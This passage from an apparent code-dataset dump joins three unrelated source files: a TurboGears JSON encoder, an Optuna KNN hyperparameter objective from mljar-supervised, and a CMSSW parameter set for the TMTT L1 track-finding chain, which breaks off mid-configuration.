the object as argument and returns an object that can be encoded in JSON (usually a dict).
"""
if objtype in self._registered_types_map:
log.warning('%s type already registered for a custom encoder, replacing it', objtype)
self._registered_types_map[objtype] = encoder
        # Prepend, so that the most recently registered types are found first.
self._registered_types_list = (objtype, ) + self._registered_types_list
def default(self, obj):
if isinstance(obj, self._registered_types_list):
# Minor optimization, enter loop only when we are instance of a supported type.
for type_, encoder in self._registered_types_map.items():
if isinstance(obj, type_):
return encoder(obj)
elif hasattr(obj, '__json__') and callable(obj.__json__):
return obj.__json__()
elif isinstance(obj, (datetime.date, datetime.datetime, datetime.time)):
if self._isodates:
if isinstance(obj, (datetime.datetime, datetime.time)):
obj = obj.replace(microsecond=0)
return obj.isoformat()
else:
return str(obj)
elif isinstance(obj, decimal.Decimal):
return float(obj)
elif is_saobject(obj):
return dictify_sqla(obj)
elif is_mingobject(obj):
return dictify_ming(obj)
elif is_query_result(obj):
return dict(rows=list(obj), count=obj.rowcount)
elif is_query_row(obj):
return dict(rows=dict(obj), count=1)
elif is_objectid(obj):
return str(obj)
elif isinstance(obj, MultiDict):
return obj.mixed()
elif isinstance(obj, types.GeneratorType):
return list(obj)
else:
return _JSONEncoder.default(self, obj)
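def _example_register_custom_encoder():
    """Illustrative sketch (not part of TurboGears): encode a hypothetical
    user-defined type by registering a custom encoder for it."""
    class Point(object):
        def __init__(self, x, y):
            self.x, self.y = x, y
    encoder = JSONEncoder()
    encoder.register_custom_encoder(Point, lambda p: {'x': p.x, 'y': p.y})
    return encoder.encode(Point(1, 2))  # e.g. '{"x": 1, "y": 2}'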
_default_encoder = JSONEncoder.create_global()
def encode(obj, encoder=None, iterencode=False):
"""Return a JSON string representation of a Python object."""
if encoder is None:
encoder = _default_encoder
encode_func = encoder.encode
if iterencode:
encode_func = encoder.iterencode
if isinstance(obj, string_type):
return encode_func(obj)
if encoder._allow_lists is False:
try:
value = obj['test']
except TypeError:
if not hasattr(obj, '__json__') and not is_saobject(obj) and not is_mingobject(obj):
raise JsonEncodeError('Your Encoded object must be dict-like.')
except:
pass
return encode_func(obj)
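def _example_encode_allow_lists():
    """Illustrative sketch (not part of TurboGears): with the default
    ``allow_lists=False``, top-level lists are refused (JSON hijacking
    mitigation) while dict-like objects encode normally."""
    enc = JSONEncoder()
    assert encode({'a': 1}, encoder=enc) == '{"a": 1}'
    try:
        encode([1, 2, 3], encoder=enc)
    except JsonEncodeError:
        pass  # expected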
def encode_iter(obj, encoder=None):
"""Encode object, yielding each string representation as available."""
return encode(obj, encoder=encoder, iterencode=True)
|
supervised/tuner/optuna/knn.py
|
stjordanis/mljar-supervised
| 1,882 |
79298
|
import numpy as np
from supervised.algorithms.knn import KNeighborsAlgorithm, KNeighborsRegressorAlgorithm
import optuna
from supervised.utils.metric import Metric
from supervised.algorithms.registry import BINARY_CLASSIFICATION
from supervised.algorithms.registry import MULTICLASS_CLASSIFICATION
from supervised.algorithms.registry import REGRESSION
class KNNObjective:
def __init__(
self,
ml_task,
X_train,
y_train,
sample_weight,
X_validation,
y_validation,
sample_weight_validation,
eval_metric,
n_jobs,
random_state,
):
self.ml_task = ml_task
self.X_train = X_train
self.y_train = y_train
self.sample_weight = sample_weight
self.X_validation = X_validation
self.y_validation = y_validation
self.eval_metric = eval_metric
self.n_jobs = n_jobs
self.seed = random_state
def __call__(self, trial):
try:
params = {
"n_neighbors": trial.suggest_int("n_neighbors", 1, 128),
"weights": trial.suggest_categorical(
"weights", ["uniform", "distance"]
),
"n_jobs": self.n_jobs,
"rows_limit": 100000,
"ml_task": self.ml_task,
}
Algorithm = (
KNeighborsRegressorAlgorithm
if self.ml_task == REGRESSION
else KNeighborsAlgorithm
)
model = Algorithm(params)
model.fit(self.X_train, self.y_train, sample_weight=self.sample_weight)
preds = model.predict(self.X_validation)
score = self.eval_metric(self.y_validation, preds)
if Metric.optimize_negative(self.eval_metric.name):
score *= -1.0
except optuna.exceptions.TrialPruned as e:
raise e
except Exception as e:
print("Exception in KNNObjective", str(e))
return None
return score
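def _example_optimize_knn(ml_task, X_train, y_train, X_validation, y_validation,
                          eval_metric, n_trials=20):
    # Illustrative sketch (not part of mljar-supervised): hand the objective
    # above to an Optuna study. Sample weights are omitted (None) here, and
    # the "minimize" direction is an assumption about the metric convention.
    objective = KNNObjective(
        ml_task, X_train, y_train, None,
        X_validation, y_validation, None,
        eval_metric, n_jobs=1, random_state=42,
    )
    study = optuna.create_study(direction="minimize")
    study.optimize(objective, n_trials=n_trials)
    return study.best_params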
|
L1Trigger/TrackFindingTMTT/python/TMTrackProducer_Defaults_cfi.py
|
ckamtsikis/cmssw
| 852 |
79308
|
import FWCore.ParameterSet.Config as cms
#---------------------------------------------------------------------------------------------------------
# This describes the full TMTT track reconstruction chain with 3 GeV threshold, where:
# the GP divides the tracker into 18 eta sectors (each sub-divided into 2 virtual eta subsectors);
# the HT uses a 32x18 array followed by 2x2 mini-HT array, with transverse HT readout & multiplexing,
# followed by the KF (or optionally SF+SLR) track fit; duplicate track removal (Algo50) is run.
#---------------------------------------------------------------------------------------------------------
TMTrackProducer_params = cms.PSet(
# Tags for ES products
magneticFieldInputTag = cms.ESInputTag( "VolumeBasedMagneticFieldESProducer", "" ),
trackerGeometryInputTag = cms.ESInputTag( "trackerGeometry", "" ),
trackerTopologyInputTag = cms.ESInputTag( "trackerTopology", "" ),
ttStubAlgoInputTag = cms.ESInputTag( "TTStubAlgorithm_official_Phase2TrackerDigi_", "" ),
# Tags for ED products
tpInputTag = cms.InputTag("mix", "MergedTrackTruth"),
stubInputTag = cms.InputTag("TTStubsFromPhase2TrackerDigis", "StubAccepted"),
stubTruthInputTag = cms.InputTag("TTStubAssociatorFromPixelDigis", "StubAccepted"),
clusterTruthInputTag = cms.InputTag("TTClusterAssociatorFromPixelDigis", "ClusterAccepted"),
genJetInputTag = cms.InputTag("ak4GenJets", ""),
# Enable output of TTTracks from part-way through tracking chain (after HT & RZ).
EnableOutputIntermediateTTTracks = cms.bool(False),
# Enable all use of MC truth info (disable to save CPU)
EnableMCtruth = cms.bool(False),
# Enable output histograms & job tracking performance summary (disable to save CPU)
EnableHistos = cms.bool(False),
#=== Cuts on MC truth particles (i.e., tracking particles) used for tracking efficiency measurements.
GenCuts = cms.PSet(
GenMinPt = cms.double(3.0),
GenMaxAbsEta = cms.double(2.4),
GenMaxVertR = cms.double(1.0), # Max distance of particle production vertex from centre of CMS.
GenMaxVertZ = cms.double(30.0),
GenMaxD0 = cms.double(5.0), # Max transverse impact parameter.
    GenMaxZ0 = cms.double(999.0), # Max longitudinal impact parameter (z0).
GenPdgIds = cms.vuint32(), # Only particles with these PDG codes used for efficiency measurement.
# Cut on MC truth tracks used for algorithmic tracking efficiency measurements.
GenMinStubLayers = cms.uint32(4)
),
#=== Cuts applied to stubs before arriving in L1 track finding board.
StubCuts = cms.PSet(
# Reduce number of bits used by front-end chips to store stub bend info?
# = 0 (no); = 1 (yes using official recipe); = 2 (yes using TMTT method)
DegradeBendRes = cms.uint32(2),
# Don't use stubs with eta beyond this cut, since the tracker geometry makes it impossible to reconstruct tracks with them.
MaxStubEta = cms.double(2.4),
# Don't use stubs whose measured Pt from bend info is significantly below HTArraySpec.HoughMinPt, where "significantly" means allowing for resolution in q/Pt derived from stub bend resolution specified below.
KillLowPtStubs = cms.bool(True),
# Print FE stub window sizes recommended by this code (in python cfg format used by CMSSW).
PrintStubWindows = cms.bool(False),
# Bend resolution assumed by bend filter in units of strip pitch. Also used when assigning stubs to sectors if EtaPhiSectors.CalcPhiTrkRes=True. And by the bend filter if HTFillingRphi.UseBendFilter=True.
# Suggested value: 1.19 if DegradeBendRes = 0, or 1.249 if it > 0.
# N.B. Avoid 1/4-integer values due to rounding error issues.
BendCut = cms.double(1.249),
# Additional contribution to bend resolution from its encoding into a reduced number of bits.
# This number is the assumed resolution relative to the naive guess of its value.
# It is ignored in DegradeBendRes = 0.
BendCutExtra = cms.double(0.0),
# Order stubs by bend in DTC, such that highest Pt stubs are transmitted first.
OrderStubsByBend = cms.bool(True)
),
#=== Optional Stub digitization.
StubDigitize = cms.PSet(
EnableDigitize = cms.bool(True), # Digitize stub coords? If not, use floating point coords.
#
#--- Parameters available in MP board. (And in case of Hybrid used internally in KF)
#
PhiSectorBits = cms.uint32(6), # Bits used to store phi sector number -- NOT USED
PhiSBits = cms.uint32(14), # Bits used to store phiS coord. (13 enough?)
PhiSRange = cms.double(0.698131700), # Range phiS coord. covers in radians.
RtBits = cms.uint32(12), # Bits used to store Rt coord.
RtRange = cms.double(91.652837), # Range Rt coord. covers in units of cm.
ZBits = cms.uint32(14), # Bits used to store z coord.
ZRange = cms.double(733.2227), # Range z coord. covers in units of cm.
#
#--- Parameters available in GP board (excluding any in common with MP specified above).
#
PhiNBits = cms.uint32(15), # Bits used to store PhiO parameter.
PhiNRange = cms.double(1.3962634), # Range PhiO parameter covers.
BendBits = cms.uint32(6) # Bits used to store stub bend.
),
#=== Configuration of tracker module type. Only provides test data for firmware.
TrackerModuleType = cms.PSet(
# Modules matching these criteria are type 0, 1, 2, 3 ...
PitchVsType = cms.vdouble(0.0099, 0.0099, 0.0099, 0.0099, 0.0089, 0.0099, 0.0089, 0.0089),
SpaceVsType = cms.vdouble(0.26 , 0.26 , 0.16 , 0.4 , 0.18 , 0.4 , 0.18 , 0.4 ),
# (Type vbool not implemented, so use vuint32 instead ...)
BarrelVsType = cms.vuint32( 1 , 1 , 1 , 1 , 1 , 0 , 0 , 0 ),
PSVsType = cms.vuint32( 1 , 1 , 1 , 1 , 0 , 1 , 0 , 0 ),
TiltedVsType = cms.vuint32( 0 , 1 , 0 , 1 , 0 , 0 , 0 , 0 )
),
#=== Configuration of Geometric Processor.
GeometricProc = cms.PSet(
# Use an FPGA-friendly approximation to determine track angle dphi from bend in GP?
UseApproxB = cms.bool(True), # Use approximation for B
# Params of approximation if used.
BApprox_gradient = cms.double(0.886454), # Gradient term of linear equation for approximating B
BApprox_intercept = cms.double(0.504148) # Intercept term of linear equation for approximating B
),
#=== Division of Tracker into phi sectors.
PhiSectors = cms.PSet(
NumPhiNonants = cms.uint32(9), # Divisions of Tracker at DTC
NumPhiSectors = cms.uint32(18), # Divisions of Tracker at GP.
ChosenRofPhi = cms.double(67.240), # Use phi of track at this radius for assignment of stubs to phi sectors & also for one of the axes of the r-phi HT. If ChosenRofPhi=0, then use track phi0. - Should be an integer multiple of the stub r digitisation granularity.
#--- You can set one or both the following parameters to True.
UseStubPhi = cms.bool(True), # Require stub phi to be consistent with track of Pt > HTArraySpec.HoughMinPt that crosses HT phi axis?
UseStubPhiTrk = cms.bool(True), # Require stub phi0 (or phi65 etc.) as estimated from stub bend, to lie within HT phi axis, allowing tolerance(s) specified below?
AssumedPhiTrkRes = cms.double(0.5), # Tolerance in stub phi0 (or phi65) assumed to be this fraction of phi sector width. (N.B. If > 0.5, then stubs can be shared by more than 2 phi sectors).
CalcPhiTrkRes = cms.bool(True) # If true, tolerance in stub phi0 (or phi65 etc.) will be reduced below AssumedPhiTrkRes if stub bend resolution specified in StubCuts.BendCut suggests it is safe to do so.
),
#=== Division of Tracker into eta sectors
EtaSectors = cms.PSet(
# Eta boundaries for 18 eta regions
# EtaRegions = cms.vdouble(-2.4,-2.16,-1.95,-1.7,-1.43,-1.16,-0.89,-0.61,-0.31,0.0,0.31,0.61,0.89,1.16,1.43,1.7,1.95,2.16,2.4),
# Eta boundaries for 16 eta regions
EtaRegions = cms.vdouble(-2.4,-2.08,-1.68,-1.26,-0.90,-0.62,-0.41,-0.20,0.0,0.20,0.41,0.62,0.90,1.26,1.68,2.08,2.4),
ChosenRofZ = cms.double(50.), # Use z of track at this radius for assignment of tracks to eta sectors & also for one of the axes of the r-z HT. Do not set to zero!
BeamWindowZ = cms.double(15), # Half-width of window assumed to contain beam-spot in z.
AllowOver2EtaSecs = cms.bool(True) # If True, the code will not throw an error if a stub is assigned to 3 or more eta sectors.
),
#=== r-phi Hough transform array specifications.
HTArraySpecRphi = cms.PSet(
HoughMinPt = cms.double(3.0), # Min track Pt that Hough Transform must find. Also used by StubCuts.KillLowPtStubs and by EtaPhiSectors.UseStubPhi.
# If MiniHTstage = True, these refers to mini cells in whole HT array.
HoughNbinsPt = cms.uint32(32), # HT array dimension in track q/Pt. (If MiniHTstage = True, this refers to mini cells in whole HT array).
HoughNbinsPhi = cms.uint32(64), # HT array dimension in track phi0 (or phi65 or any other track phi angle. (If MiniHTstage = True, this refers to mini cells in whole HT array).
EnableMerge2x2 = cms.bool(False), # Groups of neighbouring 2x2 cells in HT will be treated as if they are a single large cell? N.B. You can only enable this option if your HT array has even numbers of bins in both dimensions. And this cfg param ignored if MiniHTstage = True. HISTORIC OPTION. SUGGEST NOT USING!
MaxPtToMerge2x2 = cms.double(3.5), # but only cells with pt < MaxPtToMerge2x2 will be merged in this way (irrelevant if EnableMerge2x2 = false).
NumSubSecsEta = cms.uint32(2), # Subdivide each sector into this number of subsectors in eta within r-phi HT.
Shape = cms.uint32(0), # cell shape: 0 for square, 1 for diamond, 2 hexagon (with vertical sides), 3 square with alternate rows shifted by 0.5*cell_width.
    MiniHTstage = cms.bool(True), # Run 2nd stage HT with mini cells inside each 1st stage normal HT cell.
MiniHoughNbinsPt = cms.uint32(2), # Number of mini cells along q/Pt axis inside each normal HT cell.
MiniHoughNbinsPhi = cms.uint32(2), # Number of mini cells along phi axis inside each normal HT cell.
MiniHoughMinPt = cms.double(3.0), # Below this Pt threshold, the mini HT will not be used, to reduce sensitivity to scattering, with instead tracks found by 1st stage coarse HT sent to output. (HT cell numbering remains as if mini HT were in use everywhere).
MiniHoughDontKill = cms.bool(False), # If true, allows tracks found by 1st stage coarse HT to be output if 2nd stage mini HT finds no tracks.
MiniHoughDontKillMinPt = cms.double(8.0), # If MiniHoughDontKill=True, this option restricts it to keep 1st stage HT tracks only if their Pt is exceeds this cut. (Used to improve electron tracking above this threshold).
MiniHoughLoadBalance = cms.uint32(2) # Load balancing disabled = 0; static load balancing of output links = 1; dynamic load balancing of output links = 2.
),
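    # Illustrative note (not part of the original config; hypothetical usage):
    # downstream cfg fragments can override individual parameters after
    # importing this PSet, e.g.
    #   from L1Trigger.TrackFindingTMTT.TMTrackProducer_Defaults_cfi import TMTrackProducer_params
    #   TMTrackProducer_params.HTArraySpecRphi.HoughMinPt = cms.double(2.0)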
#=== Rules governing how stubs are filled into the r-phi Hough Transform array.
HTFillingRphi = cms.PSet(
# Take all cells in r-phi HT array crossed by line corresponding to each stub (= 0) or take only some to reduce rate at cost
# of efficiency ( > 0). If this option is > 0, it can be 1 or 2, corresponding to different algorithms for rejecting
# some of the cells. "1" is an algorithm invented by Ian, whereas "2" corresponds to Thomas' 1st firmware implementation which only handled 1 cell per HT column.
# Suggest setting KillSomeHTCellsRphi=1 (=0) if HTArraySpec.ChosenRofPhi=0 (>0)
KillSomeHTCellsRphi = cms.uint32(0),
# Use filter in each r-phi HT cell, filling it only with stubs that have consistent bend information?
# The assumed bend resolution is specified in StubCuts.BendCut.
UseBendFilter = cms.bool(True),
# Use filter in each HT cell, preventing more than the specified number of stubs being stored in the cell. (Reflecting memory limit of hardware). N.B. Results depend on assumed order of stubs.
# N.B. If mini-HT is in use, then this cut applies to coarse-HT.
#MaxStubsInCell = cms.uint32(99999), # Setting this to anything more than 999 disables this option
MaxStubsInCell = cms.uint32(32), # set it equal to value used in hardware.
MaxStubsInCellMiniHough = cms.uint32(16), # Same type of cut for mini-HT (if in use)
# If BusySectorKill = True, and more than BusySectorNumStubs stubs are assigned to tracks by an r-phi HT array, then the excess tracks are killed, with lowest Pt ones killed first. This is because HT hardware has finite readout time.
BusySectorKill = cms.bool(True),
BusySectorNumStubs = cms.uint32(162), # Or 144 if only 320 MHz FW.
# If BusySectorMbinRanges is not empty, then the BusySectorNumStubs cut is instead applied to the subset of tracks appearing in the following m bin (q/Pt) ranges of the HT array. The sum of the entries in the vector should equal the number of m bins in the HT. (N.B. If EnableMerge2x2 or MiniHTstage = True, then the m bin ranges here correspond to the bins before merging. Also in these cases, the odd m-bin numbers don't correspond to HT outputs, so should be all grouped together on a single imaginary link).
# If BusySectorMbinOrder is not empty, then the m-bins are grouped in the specified order, instead of sequentially.
# (Histos NumStubsPerLink, NumStubsVsLink & MeanStubsPerLink useful for optimising this option).
#
# Choice for 16x32 coarse HT array followed by 2x2 mini-HT array with 3 GeV Pt threshold.
BusySectorMbinRanges = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 16),
BusySectorMbinOrder = cms.vuint32(0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30, 1,3,5,7,9,11,13,15,17,19,21,23,25,27,29,31),
# Choice for 24x32 coarse HT array followed by 2x2 mini-HT array with 2 GeV Pt threshold.
#BusySectorMbinRanges = cms.vuint32(1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 24),
#BusySectorMbinOrder = cms.vuint32(0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46, 1,3,5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,39,41,43,45,47),
#
# If BusyInputSectorKill = True, and more than BusyInputSectorNumStubs are input to the HT array from the GP, then
# the excess stubs are killed. This is because HT hardware has finite readin time.
# Results unreliable as depend on assumed order of stubs.
BusyInputSectorKill = cms.bool(True),
BusyInputSectorNumStubs = cms.uint32(162), # Or 144 if only 320 MHz FW
# Multiplex the outputs from several HTs onto a single pair of output optical links?
    # Options: 0 = disable Mux; 1 = Sept 2019 Mux (transverse HT readout by m-bin), with single m bin in entire nonant going to each link.
MuxOutputsHT = cms.uint32(1),
# If this is non-empty, then only the specified eta sectors are enabled, to study them individually.
EtaRegWhitelist = cms.vuint32()
),
#=== Options controlling r-z track filters (or any other track filters run after the Hough transform, as opposed to inside it).
#=== (Irrelevant for track fitters that don't require any r-z filter run before them).
RZfilterOpts = cms.PSet(
# Specify preferred r-z filter (from those available inside TrkRZfilter.cc) - currently only "SeedFilter".
RZFilterName = cms.string("SeedFilter"),
#--- Options relevant for Seed filter, (so only relevant if rzFilterName="SeedFilter").
# Cut at this many standard deviations on seed resolution.
SeedResCut = cms.double(1.732),
# Store stubs compatible with all possible good seeds.
KeepAllSeed = cms.bool(False),
# Maximum number of seed combinations to bother checking per track candidate.
#MaxSeedCombinations = cms.uint32(999),
MaxSeedCombinations = cms.uint32(15),
# Maximum number of seed combinations consistent with (z0,eta) sector constraints to bother checking per track candidate.
#MaxGoodSeedCombinations = cms.uint32(13),
MaxGoodSeedCombinations = cms.uint32(10),
# Maximum number of seeds that a single stub can be included in.
MaxSeedsPerStub = cms.uint32(4),
# Reject tracks whose estimated rapidity from the seed filter is inconsistent with the rapidity range of the eta sector. (Kills some duplicate tracks).
zTrkSectorCheck = cms.bool(True),
# Min. number of layers in rz track that must have stubs for track to be declared found by seed filter.
MinFilterLayers = cms.uint32(4)
),
#=== Rules for deciding when the (HT) track finding has found an L1 track candidate
L1TrackDef = cms.PSet(
# Min. number of layers the track must have stubs in.
MinStubLayers = cms.uint32(5),
# Change min. number of layers cut to (MinStubLayers - 1) for tracks with Pt exceeding this cut.
# If this is set to a -ve number, this option is disabled.
MinPtToReduceLayers = cms.double(-99999.),
# Change min. number of layers cut to (MinStubLayers - 1) for tracks in these rapidity sectors.
# (Histogram "AlgEffVsEtaSec" will help you identify which sectors to declare).
#EtaSecsReduceLayers = cms.vuint32(),
EtaSecsReduceLayers = cms.vuint32(5,12),
# Reduce this layer ID, so that it takes no more than 8 different values in any eta region (simplifies firmware).
ReducedLayerID = cms.bool(True)
),
#=== Specification of algorithm to eliminate duplicate tracks.
DupTrkRemoval = cms.PSet(
# Algorithm run on tracks after the track helix fit has been done.
# (Disable dup removal = 0; two alternative algos = 1 or 2).
DupTrkAlgFit = cms.uint32(1)
),
#=== Rules for deciding when a reconstructed L1 track matches a MC truth particle (i.e. tracking particle).
TrackMatchDef = cms.PSet(
#--- Three different ways to define if a tracking particle matches a reco track candidate. (Usually, set two of them to ultra loose).
# Min. fraction of matched stubs relative to number of stubs on reco track.
MinFracMatchStubsOnReco = cms.double(-99.),
# Min. fraction of matched stubs relative to number of stubs on tracking particle.
MinFracMatchStubsOnTP = cms.double(-99.),
# Min. number of matched layers.
MinNumMatchLayers = cms.uint32(4),
# Min. number of matched PS layers.
MinNumMatchPSLayers = cms.uint32(0),
# Associate stub to TP only if the TP contributed to both its clusters? (If False, then associate even if only one cluster was made by TP).
StubMatchStrict = cms.bool(False)
),
#=== Track Fitting Algorithm Settings.
TrackFitSettings = cms.PSet(
#
#--- Options applicable to all track fitters ---
#
# Track Fitting algorithms to use. You can run several in parallel.
# TrackFitLinearAlgo & ChiSquared* are chi2 fits, KF* is a Kalman filter fit,
# & SimpleLR4 is a linear regression fit that neglects the hit uncertainties.
# The number 4 or 5 in the name indicates if 4 or 5 helix parameters are fitted.
# Options KF4ParamsComb, KF5ParamsComb or SimpleLR4 are the best ones.
# KF*ParamsCombHLS is the HLS version of the code, which only works if linked with Vivado libraries.
TrackFitters = cms.vstring(
# "ChiSquaredFit4",
# "SimpleLR4",
# "KF4ParamsCombHLS",
# "KF5ParamsCombHLS",
"KF5ParamsComb",
"KF4ParamsComb"
),
# Indicate subset of fitters wanting r-z track filter to be run before them. (Irrelevant for those not specified in "TrackFitters").
# Typically, Chi2 & LR fits work best with r-z filter & KF works best without it.
UseRZfilter = cms.vstring(
"ChiSquaredFit4",
"SimpleLR4"
),
# Print detailed summary of track fit performance at end of job (as opposed to a brief one).
DetailedFitOutput = cms.bool(False),
#
# Use MC truth to eliminate all fake tracks & all incorrect stubs assigned to tracks before doing fit.
TrackFitCheat = cms.bool(False),
#
#--- Options for chi2 track fitter ---
#
# Number of fitting iterations to undertake. (15 is not realistic in hardware, but is necessary to kill bad hits)
NumTrackFitIterations = cms.uint32(15),
# Optionally kill hit with biggest residuals in track fit (occurs after the first fit, so three iterations would have two killings).
KillTrackFitWorstHit = cms.bool(True),
# Cuts in standard deviations used to kill hits with big residuals during fit. If the residual exceeds the "General" cut, the hit is killed providing it leaves the track with enough hits to survive. If the residual exceeds the "Killing" cut, the hit is killed even if that kills the track.
GeneralResidualCut = cms.double(3.0),
KillingResidualCut = cms.double(20.0),
#
#--- Additional options for <NAME>'s Linear Regression track fitter ---
#
# Maximum allowed number of iterations of LR fitter.
MaxIterationsLR = cms.uint32( 8 ),
# If False: residual of a stub is the max of its r-phi & r-z residuals.
# If True: the residual is the mean of these residuals.
CombineResiduals = cms.bool( True ),
# Correct stub phi coordinate for higher orders in circle expansion, so that a trajectory is straight in r-phi.
LineariseStubPosition = cms.bool( True ),
# Checks if the fitted track is consistent with the sector; if not, it is not accepted.
CheckSectorConsistency = cms.bool( False ),
# Checks if the fitted track r-phi parameters are consistent with the HT candidate parameters within a range of +- 2 cells.
CheckHTCellConsistency = cms.bool( False ),
# Tracks must have stubs in at least this number of PS layers.
MinPSLayers = cms.uint32( 2 ),
# Digitization
DigitizeLR = cms.bool( False ),
PhiPrecision = cms.double( 0.009 / 108. ),
RPrecision = cms.double( 0.14 ),
ZPrecision = cms.double( 0.28 ),
ZSlopeWidth = cms.uint32( 11 ),
ZInterceptWidth = cms.uint32( 11 ),
#
#--- Additional options for <NAME>'s Simple Linear Regression track fitter ---
#
# Digitize Simple Linear Regression variables and calculation. (Disabled if EnableDigitize=False).
DigitizeSLR = cms.bool(False), # Disable, as was never retuned for nonants
# Number of bits to be used in hardware to compute the division needed to calculate the helix params
DividerBitsHelix = cms.uint32(23),
DividerBitsHelixZ = cms.uint32(23),
# Number of bits to reduce the rphi helix parameter calculation weight
ShiftingBitsDenRPhi = cms.uint32(14),
# Number of bits to reduce the rphi helix parameter calculation weight
ShiftingBitsDenRZ = cms.uint32(14),
# Number of bits to reduce the phi0 parameter calculation weight
ShiftingBitsPhi = cms.uint32(10),
# Number of bits to reduce the qOverPt parameter calculation weight
ShiftingBitsPt = cms.uint32(3),
# Number of bits to reduce the tanLambda parameter calculation weight
ShiftingBitsLambda = cms.uint32(1),
# Number of bits to reduce the z0 parameter calculation weight
ShiftingBitsZ0 = cms.uint32(16),
# Fit ChiSquare Cut (tightening reduces fake track rate at cost of efficiency)
SLR_chi2cut = cms.double(300.),
# Cut on Rphi Residuals (radians) - stubs killed until only 4 left or all have residuals below this cut.
ResidualCut = cms.double(0.0),
#ResidualCut = cms.double(0.0005), # This allows more than 4 stubs per track.
#
#--- Options for Kalman filter track fitters ---
#
# Larger number has more debug printout. "1" is useful for understanding why tracks are lost, best combined with TrackFitCheat=True.
KalmanDebugLevel = cms.uint32(0),
# Fit will reject fitted tracks unless it can assign at least this number of stubs to them.
KalmanMinNumStubs = cms.uint32(4),
# Fit will attempt to add up to this number of stubs to each fitted track, but won't bother adding more.
KalmanMaxNumStubs = cms.uint32(4),
# For 5-param helix fits, calculate also beam-constrained helix params after fit is complete, & use them for duplicate removal if DupTrkAlgFit=1.
KalmanAddBeamConstr = cms.bool(True),
# Remove requirement of at least 2 PS layers per track.
KalmanRemove2PScut = cms.bool(False),
# Allow the KF to skip this many layers in total per track.
KalmanMaxSkipLayersHard = cms.uint32(1), # For HT tracks with many stubs
KalmanMaxSkipLayersEasy = cms.uint32(2), # For HT tracks with few stubs
KalmanMaxStubsEasy = cms.uint32(10), # Max stubs an HT track can have to be "easy".
KFUseMaybeLayers = cms.bool(False), # Disable "maybe layer" to match with firmware
#--- Cuts applied to KF states as a function of the last KF tracker layer they had a stub in.
# (If "4" or "5" in name, cut only applies to 4 or 5 param helix fit).
KFLayerVsPtToler = cms.vdouble(999., 999., 0.1 , 0.1 , 0.05, 0.05, 0.05),
# d0 cut only applied to 5 param helix fit.
KFLayerVsD0Cut5 = cms.vdouble(999., 999., 999., 10. , 10. , 10. ,10. ),
KFLayerVsZ0Cut5 = cms.vdouble(999., 999., 25.5, 25.5, 25.5, 25.5,25.5 ),
KFLayerVsZ0Cut4 = cms.vdouble(999., 999. ,15. , 15. , 15. , 15. ,15. ),
# Chi2 cuts should be retuned if KalmanMultiScattTerm value changed.
KFLayerVsChiSq5 = cms.vdouble(999., 999., 10. , 30. , 80. , 120., 160.),
KFLayerVsChiSq4 = cms.vdouble(999., 999., 10. , 30. , 80. , 120., 160.),
# KF will consider at most this #stubs per layer to save time.
KalmanMaxStubsPerLayer = cms.uint32(4),
# Multiple scattering term - inflate hit phi errors by this divided by Pt
# (0.00075 gives best helix resolution & 0.00450 gives best chi2 distribution).
KalmanMultiScattTerm = cms.double(0.00075),
# Scale down chi2 in r-phi plane by this factor to improve electron performance (should be power of 2)
KalmanChi2RphiScale = cms.uint32(8),
# N.B. KF track fit chi2 cut is not cfg param, but instead is hard-wired in KF4ParamsComb::isGoodState(...).
#--- Enable Higher order corrections
# Treat z uncertainty in tilted barrel modules correctly.
KalmanHOtilted = cms.bool(False),
# Higher order circle expansion terms for low Pt.
KalmanHOhelixExp = cms.bool(False),
# Alpha correction for non-radial 2S endcap strips. (0=disable correction, 1=correct with offset, 2=correct with non-diagonal stub covariance matrix). -- Option 1 is easier in FPGA, but only works if fit adds PS stubs before 2S ones.
KalmanHOalpha = cms.uint32(0),
# Projection from (r,phi) to (z,phi) for endcap 2S modules. (0=disable correction, 1=correct with offset, 2=correct with non-diagonal stub covariance matrix). -- Option 1 is easier in FPGA, but only works if fit adds PS stubs before 2S ones.
KalmanHOprojZcorr = cms.uint32(0),
# Use approx calc to account for non-radial endcap 2S modules corresponding to current FW, with no special treatment for tilted modules.
KalmanHOfw = cms.bool(True)
),
#=== Treatment of dead modules.
DeadModuleOpts = cms.PSet(
# Emulate dead/inefficient modules using the StubKiller code, with stubs killed according to the scenarios of the Stress Test group.
# (0=Don't kill any stubs; 1-5 = Scenarios described in StubKiller.cc)
KillScenario = cms.uint32(0),
# Modify TMTT tracking to try to recover tracking efficiency in presence of dead modules. (Does nothing if KillScenario = 0).
KillRecover = cms.bool (True)
),
#=== Fitted track digitisation.
TrackDigi=cms.PSet(
# For firmware reasons, can't use common digitisation cfg for all fitters.
#======= SimpleLR4 digi parameters ========
SLR_skipTrackDigi = cms.bool( False ), # Optionally skip track digitisation if done internally inside fitting code.
SLR_oneOver2rBits = cms.uint32(13),
SLR_oneOver2rRange = cms.double(0.01354135),
SLR_d0Bits = cms.uint32(12), # Made up by Ian as never yet discussed.
SLR_d0Range = cms.double(10.),
SLR_phi0Bits = cms.uint32(18),
SLR_phi0Range = cms.double(1.3962636), # phi0 is actually only digitised relative to centre of sector.
SLR_z0Bits = cms.uint32(12),
SLR_z0Range = cms.double(51.555509),
SLR_tanlambdaBits = cms.uint32(15),
SLR_tanlambdaRange = cms.double(32.0),
SLR_chisquaredBits = cms.uint32(10),
SLR_chisquaredRange = cms.double(512.),
#====== Kalman Filter digi parameters ========
KF_skipTrackDigi = cms.bool( False ), # Optionally skip track digitisation if done internally inside fitting code.
KF_oneOver2rBits = cms.uint32(15),
KF_oneOver2rRange = cms.double(0.0076171313), # pT > 1.5 GeV
KF_d0Bits = cms.uint32(12),
KF_d0Range = cms.double(31.992876),
KF_phi0Bits = cms.uint32(12),
KF_phi0Range = cms.double(0.6981317), # phi0 digitised relative to centre of sector. (Required range 2pi/18 + 2*overlap; overlap = 0.19206rads*(2GeV/ptCut)*(chosenR/67.24). MUST DOUBLE TO GO TO 2 GEV.
KF_z0Bits = cms.uint32(12),
KF_z0Range = cms.double(45.826419),
KF_tanlambdaBits = cms.uint32(16),
KF_tanlambdaRange = cms.double(16.),
KF_chisquaredBits = cms.uint32(15), # N.B. 17 bits are used internally inside KF.
KF_chisquaredRange = cms.double(1024.),
